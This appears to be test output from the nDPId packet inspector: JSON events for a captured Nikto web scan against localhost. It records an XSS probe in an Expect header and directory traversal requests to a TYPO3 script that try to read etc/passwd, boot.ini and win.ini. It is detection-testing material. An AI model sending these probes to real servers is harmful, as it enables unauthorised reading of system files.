(Test:negotiate)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1576420276840,"pkt":"AAAAAAAAAAAAAAAACABFAAEXDe5AAEAGLfF\/AAABfwAAAcJsH5C64jXXMX558oAYAED\/CwAAAQEICp1m+5CdZvuQR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL2hvc3RzJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420276840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/hosts%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00798{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1576420276841,"pkt":"AAAAAAAAAAAAAAAACABFAAEi9VxAAEAGRnd\/AAABfwAAAcJuH5BHUs1h0rvodIAYAED\/FgAAAQEICp1m+5GdZvuRR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvSEFTSCgweDU1NTllODRmYmM0MCklMDAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420276841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/HASH(0x5559e84fbc40)%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":297,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":297,"pkt_l4_len":263,"thread_ts_msec":1576420276842,"pkt":"AAAAAAAAAAAAAAAACABFAAEbV1RAAEAG5IZ\/AAABfwAAAcJwH5AGYW9pnm57IYAYAED\/DwAAAQEICp1m+5KdZvuSR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2lubnQvd2luLmluaSUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420276842,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/winnt\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1576420276844,"pkt":"AAAAAAAAAAAAAAAACABFAAEdYctAAEAG2g1\/AAABfwAAAcJyH5D8wFnzKu6RnoAYAED\/EQAAAQEICp1m+5SdZvuUR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvd2luZG93cy93aW4uaW5pJTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEaXJlY3RvcnkgdHJhdmVyc2FsIGNoZWNrKQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420276844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/windows\/win.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1576420276847,"pkt":"AAAAAAAAAAAAAAAACABFAAEYOOhAAEAGAvZ\/AAABfwAAAcJ0H5DjgwDevH40fYAYAED\/DAAAAQEICp1m+5adZvuWR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvZXRjL3Bhc3N3ZCUwMCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RGlyZWN0b3J5IHRyYXZlcnNhbCBjaGVjaykNCg0K"} -01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420276847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276856,"pkt":"AAAAAAAAAAAAAAAACABFAADBvW9AAEAGfsV\/AAABfwAAAcJ2H5DTj4VUAEbtioAYAED+tQAAAQEICp1m+6CdZvugR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276856,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 